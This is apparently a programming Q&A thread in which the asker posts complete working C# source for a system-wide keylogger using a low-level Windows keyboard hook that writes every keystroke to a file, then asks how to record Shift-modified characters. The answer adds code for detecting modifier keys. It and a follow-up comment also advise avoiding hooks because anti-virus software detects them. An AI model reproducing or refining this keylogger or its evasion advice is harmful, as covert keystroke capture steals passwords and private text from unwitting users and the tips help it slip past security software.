# How to properly capture user's keystrokes in C#, i.e. respecting SHIFT key etc

Tags: c#, winapi, interop, pinvoke, user32

I have written the following C# program to capture the user's keystrokes.

It works perfectly, except that all keys are logged as lower-case without taking the SHIFT key into account (see below).

I have read all of the Win32 API's documentation. Still I much be missing something.

How can I correct this program to log keystrokes properly?

If I enter `HelloWorld!!!`, the following keys are output in log.txt:

```
h
e
l
l
o
w
o
r
l
d
1
1
1
```

I.e., it does not consider SHIFT, which is the purpose of `GetKeyboardState()`?

The program:

```
using System;
using System.IO;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
using System.Text;

namespace CSharpKeyLogger
{
    public static class Program
    {
        [DllImport("user32.dll")]
        private static extern IntPtr SetWindowsHookEx(int idHook, HookProc lpfn, IntPtr hMod, uint dwThreadId);

        [DllImport("user32.dll")]
        private static extern bool UnhookWindowsHookEx(IntPtr hhk);

        [DllImport("user32.dll")]
        private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

        [DllImport("kernel32.dll")]
        private static extern IntPtr GetModuleHandle(string lpModuleName);

        [DllImport("user32.dll", CharSet = CharSet.Auto)]
        public static extern int GetKeyboardState(byte[] keystate);

        [DllImport("user32.dll", CharSet = CharSet.Auto)]
        public static extern int MapVirtualKey(uint uCode, int uMapType);

        [DllImport("user32.dll", CharSet = CharSet.Auto)]
        public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);

        private const int WH_KEYBOARD_LL = 13;
        private const int WM_KEYDOWN = 0x0100;

        private const int MAPVK_VK_TO_VSC = 0;

        private const int BUFF_SZ = 4;

        private const string logFileName = "log.txt";
        private static StreamWriter logFile;

        private static HookProc hookProc = HookCallback;
        private static IntPtr hookId = IntPtr.Zero;

        public static void Main()
        {
            logFile = File.AppendText(logFileName);
            logFile.AutoFlush = true;

            hookId = SetHook(hookProc);
            Application.Run();
            UnhookWindowsHookEx(hookId);
        }

        private static IntPtr SetHook(HookProc hookProc)
        {
            IntPtr moduleHandle = GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName);
            return SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, moduleHandle, 0);
        }

        private delegate IntPtr HookProc(int nCode, IntPtr wParam, IntPtr lParam);

        private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
        {
            if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
            {
                uint vkCode = (uint)Marshal.ReadInt32(lParam);

                byte[] kb = new byte[256];
                GetKeyboardState(kb);

                StringBuilder buf = new StringBuilder(BUFF_SZ + 1);

                switch(ToUnicode(vkCode, (uint)MapVirtualKey(vkCode, MAPVK_VK_TO_VSC), kb, buf, BUFF_SZ, 0))
                {
                    case -1:
                        break;
                    case 0:
                        break;
                    case 1:
                    case 2:
                    case 3:
                    case 4:
                        logFile.WriteLine(buf.ToString());
                        break;
                }
            }

            return CallNextHookEx(hookId, nCode, wParam, lParam);
        }
    }
}
```

Comment: you will have to check the modifier keys like shift and take action on it.

Comment: @codeteq - Will you provide a small example of how to do it? Shouldn't GetKeyboardState() do exactly that?

Comment: Since you are programming in C#, what does this have to do with C++?  You should remove the tag and stick with one language.

Comment: @ThomasMatthews - I use C++ Win32 APIs.

Comment: Read the docs on GetKeyboardState(). https://msdn.microsoft.com/en-us/library/windows/desktop/ms646299(v=vs.85).aspx -- There's also GetKeyState(): https://msdn.microsoft.com/en-us/library/windows/desktop/ms646301(v=vs.85).aspx

Comment: see my answer below, btw. if you try to create a keylogger (assuming for good things) don't use hooks as they can be easily detected by other programs i.e. most anti-virus software - making a bad impression of your program.

Comment: Windows API is language agnostic. This is C#.

Answer (score 1):

You will need to check modifier keys by yourself:

Use [GetAsyncKeyState](https://msdn.microsoft.com/de-de/library/windows/desktop/ms646293(v=vs.85).aspx)

```
    [DllImport("user32.dll")]
    static extern long GetAsyncKeyState(uint nVirtKey);
```

Then you will need to figure out which modifier key is pressed while you obtain the other keys. In your code you could do it like this:

```
 var t = buf.ToString();
 //  > 1 for the condition is working there are certain values for keydown/keypressed etc. just example!
 var shifted = GetAsyncKeyState((uint)Keys.LShiftKey) > 1
               || GetAsyncKeyState((uint)Keys.RShiftKey) > 1;
 if (shifted)
      t = t.ToUpper();
 Console.Write(t);
```

> If you try to create a keylogger (assuming for good things) don't use
>   hooks as they can be easily detected by other programs i.e. most
>   anti-virus software - making a bad impression of your program.

Comment: thanks. However, I've seen other people say that hooks are much more efficient memory-wise? The statement `t = t.ToUpper();` does that work if `t=1` and should be "!" ?

Comment: hooks are more efficient memeory-wise, but easily detected. ToUpper works only for alphabet caharacters. it's just an example.